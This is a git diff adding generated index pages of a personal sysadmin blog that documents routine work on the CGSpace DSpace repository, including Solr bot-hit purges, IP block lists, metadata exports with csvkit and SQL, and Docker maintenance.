+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-07/">July, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-07-02T14:07:36+03:00">Sat Jul 02, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-07-02">2022-07-02</h2>
+<ul>
+<li>I learned how to use the Levenshtein functions in PostgreSQL
+<ul>
+<li>The thing is that there is a limit of 255 characters for these functions in PostgreSQL so you need to truncate the strings before comparing</li>
+<li>Also, the trgm functions I&rsquo;ve used before are case insensitive, but Levenshtein is not, so you need to make sure to lower case both strings first</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-06/">June, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-06-06T09:01:36+03:00">Mon Jun 06, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-06-06">2022-06-06</h2>
+<ul>
+<li>Look at the Solr statistics on CGSpace
+<ul>
+<li>I see 167,000 hits from a bunch of Microsoft IPs with reverse DNS &ldquo;msnbot-&rdquo; using the Solr query <code>dns:*msnbot* AND dns:*.msn.com</code></li>
+<li>I purged these first so I could see the other &ldquo;real&rdquo; IPs in the Solr facets</li>
+</ul>
+</li>
+<li>I see 47,500 hits from 80.248.237.167 on a data center ISP in Sweden, using a normal user agent</li>
+<li>I see 13,000 hits from 163.237.216.11 on a data center ISP in Australia, using a normal user agent</li>
+<li>I see 7,300 hits from 208.185.238.57 from Britanica, using a normal user agent
+<ul>
+<li>There seem to be many more of these:</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-05/">May, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-05-04T09:13:39+03:00">Wed May 04, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-05-04">2022-05-04</h2>
+<ul>
+<li>I found a few more IPs making requests using the shady Chrome 44 user agent in the last few days so I will add them to the block list too:
+<ul>
+<li>18.207.136.176</li>
+<li>185.189.36.248</li>
+<li>50.118.223.78</li>
+<li>52.70.76.123</li>
+<li>3.236.10.11</li>
+</ul>
+</li>
+<li>Looking at the Solr statistics for 2022-04
+<ul>
+<li>52.191.137.59 is Microsoft, but they are using a normal user agent and making tens of thousands of requests</li>
+<li>64.39.98.62 is owned by Qualys, and all their requests are probing for /etc/passwd etc</li>
+<li>185.192.69.15 is in the Netherlands and is using a normal user agent, but making excessive automated HTTP requests to paths forbidden in robots.txt</li>
+<li>157.55.39.159 is owned by Microsoft and identifies as bingbot so I don&rsquo;t know why its requests were logged in Solr</li>
+<li>52.233.67.176 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests</li>
+<li>157.55.39.144 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests</li>
+<li>207.46.13.177 is owned by Microsoft and identifies as bingbot so I don&rsquo;t know why its requests were logged in Solr</li>
+<li>If I query Solr for <code>time:2022-04* AND dns:*msnbot* AND dns:*.msn.com.</code> I see a handful of IPs that made 41,000 requests</li>
+</ul>
+</li>
+<li>I purged 93,974 hits from these IPs using my <code>check-spider-ip-hits.sh</code> script</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-04/">April, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-04-01T10:53:39+03:00">Fri Apr 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
+  <a href='https://alanorth.github.io/cgspace-notes/2022-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-03/">March, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-03-01T16:46:54+03:00">Tue Mar 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-03-01">2022-03-01</h2>
+<ul>
+<li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
+</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
+</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
+</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
+</span></span></code></pre></div>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-02/">February, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-02-01T14:06:54+02:00">Tue Feb 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-02-01">2022-02-01</h2>
+<ul>
+<li>Meeting with Peter and Abenet about CGSpace in the One CGIAR
+<ul>
+<li>We agreed to buy $5,000 worth of credits from Atmire for future upgrades</li>
+<li>We agreed to move CRPs and non-CGIAR communities off the home page, as well as some other things for the CGIAR System Organization</li>
+<li>We agreed to make a Discovery facet for CGIAR Action Areas above the existing CGIAR Impact Areas one</li>
+<li>We agreed to try to do more alignment of affiliations/funders with ROR</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-01/">January, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-01-01T15:20:54+02:00">Sat Jan 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-01-01">2022-01-01</h2>
+<ul>
+<li>Start a full harvest on AReS</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-12/">December, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-12-01T16:07:07+02:00">Wed Dec 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-12-01">2021-12-01</h2>
+<ul>
+<li>Atmire merged some changes I had submitted to the COUNTER-Robots project</li>
+<li>I updated our local spider user agents and then re-ran the list with my <code>check-spider-hits.sh</code> script on CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
+</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics
+</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics
+</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679
+</span></span></code></pre></div>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/posts/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/posts/page/3/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/posts/page/3/index.html b/docs/posts/page/3/index.html
new file mode 100644
index 000000000..cd4981629
--- /dev/null
+++ b/docs/posts/page/3/index.html
@@ -0,0 +1,444 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Posts" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/posts/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Posts"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "Blog",
+  "headline": "CGSpace Notes",
+  "url" : "https://alanorth.github.io/cgspace-notes/posts/",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "dateModified": "2023-07-01T17:14:36+03:00",
+  "keywords": "notes, migration, notes",
+  "description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
+}
+</script>
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/posts/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/posts/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-11/">November, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-11-02T22:27:07+02:00">Tue Nov 02, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-11-02">2021-11-02</h2>
+<ul>
+<li>I experimented with manually sharding the Solr statistics on DSpace Test</li>
+<li>First I exported all the 2019 stats from CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid
+</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json
+</span></span></code></pre></div>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-10/">October, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-10-01T11:14:07+03:00">Fri Oct 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-10-01">2021-10-01</h2>
+<ul>
+<li>Export all affiliations on CGSpace and run them against the latest RoR data dump:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
+</span></span><span style="display:flex;"><span>ations-matching.csv
+</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
+</span></span><span style="display:flex;"><span>1879
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt 
+</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt
+</span></span></code></pre></div><ul>
+<li>So we have 1879/7100 (26.46%) matching already</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-09/">September, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-09-01T09:14:07+03:00">Wed Sep 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-09-02">2021-09-02</h2>
+<ul>
+<li>Troubleshooting the missing Altmetric scores on AReS
+<ul>
+<li>Turns out that I didn&rsquo;t actually fix them last month because the check for <code>content.altmetric</code> still exists, and I can&rsquo;t access the DOIs using <code>_h.source.DOI</code> for some reason</li>
+<li>I can access all other kinds of item metadata using the Elasticsearch label, but not DOI!!!</li>
+<li>I will change <code>DOI</code> to <code>tomato</code> in the repository setup and start a re-harvest&hellip; I need to see if this is some kind of reserved word or something&hellip;</li>
+<li>Even as <code>tomato</code> I can&rsquo;t access that field as <code>_h.source.tomato</code> in Angular, but it does work as a filter source&hellip; sigh</li>
+</ul>
+</li>
+<li>I&rsquo;m having problems using the OpenRXV API
+<ul>
+<li>The syntax Moayad showed me last month doesn&rsquo;t seem to honor the search query properly&hellip;</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-08/">August, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-08-01T09:01:07+03:00">Sun Aug 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-08-01">2021-08-01</h2>
+<ul>
+<li>Update Docker images on AReS server (linode20) and reboot the server:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
+</span></span></code></pre></div><ul>
+<li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-07/">July, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-07-01T08:53:07+03:00">Thu Jul 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-07-01">2021-07-01</h2>
+<ul>
+<li>Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>COPY 20994
+</span></span></code></pre></div>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-06/">June, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-06-01T10:51:07+03:00">Tue Jun 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-06-01">2021-06-01</h2>
+<ul>
+<li>IWMI notified me that AReS was down with an HTTP 502 error
+<ul>
+<li>Looking at UptimeRobot I see it has been down for 33 hours, but I never got a notification</li>
+<li>I don&rsquo;t see anything in the Elasticsearch container logs, or the systemd journal on the host, but I notice that the <code>angular_nginx</code> container isn&rsquo;t running</li>
+<li>I simply started it and AReS was running again:</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-05/">May, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-05-02T09:50:54+03:00">Sun May 02, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-05-01">2021-05-01</h2>
+<ul>
+<li>I looked at the top user agents and IPs in the Solr statistics for last month and I see these user agents:
+<ul>
+<li>&ldquo;RI/1.0&rdquo;, 1337</li>
+<li>&ldquo;Microsoft Office Word 2014&rdquo;, 941</li>
+</ul>
+</li>
+<li>I will add the RI/1.0 pattern to our DSpace agents overload and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one&hellip; as that&rsquo;s an actual user&hellip;</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-04/">April, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-04-01T09:50:54+03:00">Thu Apr 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-04-01">2021-04-01</h2>
+<ul>
+<li>I wrote a script to query Sherpa&rsquo;s API for our ISSNs: <code>sherpa-issn-lookup.py</code>
+<ul>
+<li>I&rsquo;m curious to see how the results compare with the results from Crossref yesterday</li>
+</ul>
+</li>
+<li>AReS Explorer was down since this morning, I didn&rsquo;t see anything in the systemd journal
+<ul>
+<li>I simply took everything down with docker-compose and then back up, and then it was OK</li>
+<li>Perhaps one of the containers crashed, I should have looked closer but I was in a hurry</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-03/">March, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-03-01T10:13:54+02:00">Mon Mar 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-03-01">2021-03-01</h2>
+<ul>
+<li>Discuss some OpenRXV issues with Abdullah from CodeObia
+<ul>
+<li>He&rsquo;s trying to work on the DSpace 6+ metadata schema autoimport using the DSpace 6+ REST API</li>
+<li>Also, we found some issues building and running OpenRXV currently due to ecosystem shift in the Node.js dependencies</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/">CGSpace CG Core v2 Migration</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-02-21T13:27:35+02:00">Sun Feb 21, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/migration/" rel="tag">Migration</a>
+
+</p>
+  </header>
+  <p>Changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2. Implemented on 2021-02-21.</p>
+<p>With reference to <a href="https://agriculturalsemantics.github.io/cg-core/cgcore.html">CG Core v2 draft standard</a> by Marie-Angélique as well as <a href="http://www.dublincore.org/specifications/dublin-core/dcmi-terms/">DCMI DCTERMS</a>.</p>
+  <a href='https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/posts/page/2/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/posts/page/4/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/posts/page/4/index.html b/docs/posts/page/4/index.html
new file mode 100644
index 000000000..67098125d
--- /dev/null
+++ b/docs/posts/page/4/index.html
@@ -0,0 +1,464 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Posts" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/posts/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Posts"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "Blog",
+  "headline": "CGSpace Notes",
+  "url" : "https://alanorth.github.io/cgspace-notes/posts/",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "dateModified": "2023-07-01T17:14:36+03:00",
+  "keywords": "notes, migration, notes",
